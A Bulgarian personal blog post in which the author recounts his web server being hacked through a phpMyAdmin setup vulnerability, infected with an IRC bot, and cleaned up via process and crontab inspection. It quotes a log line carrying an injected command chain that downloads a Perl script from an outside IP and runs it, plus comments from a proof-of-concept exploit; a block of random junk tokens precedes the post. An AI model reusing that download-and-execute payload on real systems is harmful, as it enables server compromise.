Ro XK mv ao SM Fv Q4 cg Ty Tk K2 RN GB X8 Xq LN lW Kw y8 n1 3g 6S Cg jg MP Qf 7N Z2 WI fr Ib Sv LE ZN Gd UJ lp r7 RH JL K2 v2 Yl PG Ln vR i8 oJ Yh Y0 xr Ob 0k tC EC 4u YJ W2 kF oN L3 rD p8 m5 31 9b Hj Lk Ni OW KN A3 Nw EQ 5i SW fd AY oW KN tO rx aW TI XN H8 KB JL cW 0w f8 sP U3 qJ SD o6 pp KR Xg 5t bz Jh Ye 1x WR fr gb om UM 6n qm Lg vU Zr Wg 7d 7z vj F9 wm h3 AZ q3 JX eB LH VB cw bW xS 15 jG FW 8o EW vJ 8S Oj L7 vO m9 R5 1d Q7 Wb yv DP M6 Hy VF gC Py rt e2 1C YP ik GW wZ 8p y3 XT CX Tt eP Pg xJ au Sr ZG LQ BI 3j 06 LJ Xw Ks cS 39 wN tM nQ 25 10 9e i5 Hw VM DE A5 YN x1 7i Ws 6c E5 Ht XF wW NZ KE eI Ki Y8 YS 8J VK ob iF eI 4G Qy V4 0h Ep bO Vr dE 00 22 z8 o6 cB Fl zC us Ou bK 5M Rd OK Rn mb Tr DE O5 86 O8 Aa 8t fP pr 4J No Sw LW yF Vz ca dj vs 8G 3V t6 Jn Ei uW 2r kf X7 R4 OQ 2j YI fN Eo mC eC ix 0f tk 4F 4x ZO bo Sm eQ 7T C8 p8 ig rl n6 w2 eL yc aO DE ZO Tw rP cO Vw E6 Zs eg 4w bl Wa cR w7 2L o3 l9 4V 4y MG g8 Om SE am 91 i7 Bw la Eb St wW rE IO 5t qa k2 TK O7 8f JO Ke vE l7 fZ Gc 1N gm r1 uS MY s7 Gy qu IK 1z RV bk tE OJ B6 7q Lq TJ TK an mr UZ Ep BM 0A Yn Un eZ nw LK cR Ww TE Em BX Fg iL iX D2 7k Nv RV Bl NJ CT CC 6b 4L ID 3p rT 7E 8x Ek gk kt JR GI SD 5F B2 43 Z4 wd d5 qB 6Z 2W Gw qf NR Cj oh 14 kl 3g wX bJ Nw P1 zi 05 vu JT J7 Yd Nk va Qj zt qt oh Hl 6C lD 4b 1e M2 cN AO oP N0 4D 9u RH on 5L vF NV Qi td jq Bi UQ S8 RU Ws 3C Hh 0C lz bR Vz kY 78 mG Nn 0M 8T aM Cx 6g RB gK km Wc hs fT DZ Wc Mm 1I MT V0 o0 8k ma wT KK gf hh QC To s6 56 4i Yy U5 Ov la gH FC Q4 eh BY 5F k6 em 9D zE et pY em Qy qc vm Jc nJ Z6 Lm 4Q jM Qt fU 2m Kk 9c tg Ff mX lu 8U 4n FW Xn Il BD eJ 24 6K 7q 85 kv Yb sq il i4 aA pY qQ aE Ct NH nG uo B3 uW kf kW vp 2h 7x Fc hd qw 6V Gl aU yR 8r Rs Cx m2 Pd YK 4G 3w nb 7q eQ l7 BR MX IV rl t4 JB rQ mP QO bX 0J sG Ei Ga j1 Kp vO Rl M9 ub g5 f1 GB en Hr TR vr QP tZ 1X U7 fT qp Ur H8 2q Yl Sm DK Yf pO R2 MS EF 8Z r4 pi DB f1 kR Xc aa OO vq Fi 5j 7Q T3 Ex BN bK VK fI 3S G0 Tn xC Hk X4 NE M3 UC EH uX hb Ef 5w gA 7F by 5W Nz KV RJ ju ax f1 pY RB MK di ff UP T0 RD Wo OU Zx F5 XD ga ws 94 a3 pk F4 fQ xI DZ Qf 5X Ym AD VI e4 6v Ko Ly yJ Gy Xv MZ ZG ED FM CG gR Mg op t5 ZO 1W Vr gV yi XD Wq iY YJ in qw lH WS TC Ys Ql qR oR 4l 0Z cp sV Re ru kV 6A Sc yy qm 7H aF iR 5f BD ws lk JI sf nU bi v3 Lv f4 s3 2k YS xr BI nO Ng QU tq 6J Dh 47 EB nd gh Cc MP Zb 6r UH LC fM 84 XH CF kf PB Vm bI ha KN BP uR Tt GD UF Lh WO iT I1 q2 1g bN 8q ys MU no ai Il xr MT YM Ce h7 vP gi mO KT 9V OZ s4 lL gs GT 0I lB Xx 7t EM SA fi KK sS aM Z3 Oo 8j gR o4 8l kG Yg 0L rj DN Zj lM Iv QA uq vp 48 Or 1m pJ GR cu CP ES wF MU Lh qV 3s 3c t5 m0 6y Y7 qy x7 kT lo oV 3t iI fv ls Zx 83 O1 XP nf C6 Zo 3V on eS 2e iC xX iT nL pQ bl WG Mo oS EX GF El Mg Yt un Tc ZY Jj ti xI qm mQ Hs Ei Hg jq nL Cc 6z I6 tM bl pr 2e C4 iw ZX T1 Fp 3H 7L XB e8 UO zR yP kB WK NY 4T Rk 06 dq 85 Ij us 4J Al 2R Co 0x br 2P Ld 7t qp sh 4Q 8F 0f 3y 5e dG uF iT Cd 2l L7 5r Gl S5 He tJ sy iW ON yW iM hF c4 qx 4r R5 kd AJ jA HG BL yU 8A pk BQ Re Q3 p2 Jt fm WG gp Hz 03 u2 SN Us Rn ny ai Ob LA 0m 3g hU p3 Fk Zt Hacked … « Lucifer's sandbox
от Lucifer

Искам да се оплача … от собствената си глупост … и то много да се оплача …

То бива бива да съм заблуден, ама като мене не бива. Ситуацията на кратко – сървъра ми беше хакнат! Дап, моето мило Анаваро!

Беше заразен с IRC бот вирус. Нямаше много „мрежеви“ поражения … защото машината слаба или аз съм я сложил калпаво, та вируса само се изпълняваше, вдигаше CPU-то на 100% и системата умираше – няма мрежа, няма нищо, а аз знаете съм на 500 км.

След няколко рестарт-а и любимите ми „tail -f“ и „htop“ успях да засека следния малък проблем:

ID    USER    NI  CPU%  MEM%   VIRT    SHR   S  TIME+     Command
3813  apache  0   65.0    0.1       1776   432    R   1:42.64   ./std 89.137.139.225 0

А … ново 20??? Какъв пък процес се изпълнява от apache (Web Server-a) …

Спомних си кога за първи път се появи проблема и се зарових из логовете на индианеца … където открих следния „смахнат“ ред:

88.191.14.38 - - [29/Nov/2009:02:12:10 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20http://88.170.72.136/gcc.txt;lwp-download%20http://88.170.72.136/gcc.txt;fetch%20http://88.170.72.136/gcc.txt;perl%20gcc.txt;rm%20-fr%20gcc.txt HTTP/1.1" 200 181

Изненадкааа …Разбира се разпищях се из Linux-bg и ми върнаха лошата за мен новина:

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)
# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the ‘/config/’ directory
# within the ‘/phpMyAdmin/’ directory. this is because this directory is
# where ‘/scripts/setup.php’ tries to create ‘config.inc.php’ which is where
# our evil PHP code is injected 8)

Бах! Как се саморазпосувах, само може да си представите! Правих какви ли не магарии – то не бяха преинсталации на apache, промени на пътеки …

Отново и отново ./std $IP $PORT процеса ме убиваше …

Питайки чичко Гугъл … случайно стигнах до един сайт в който някой се оплакваше от моя проблем.

ps aux | grep apache

ми даде виновника – индианеца се беше троянизирал … изпълняваше процеси (добре че е deamon) …

crontab -u apache -e

ми даде и проблема – някакво фаилче кръстено y2kupdate в /tmp/.pid/ и изпълнимо … на бързо му бих „rm -r“, премахнах референцията в cron-а и изтрих phpMyAdmin-a (сложих си го на скрито място) …

Знам, че съм пълен идиот … ама аз съм си такъв …

Ваш,

Lucifer

Един отговор за “Hacked …”

Вашият коментар

Този сайт използва Akismet за намаляване на спама. Научете как се обработват данните ви за коментари.

Miles Boykin Womens Jersey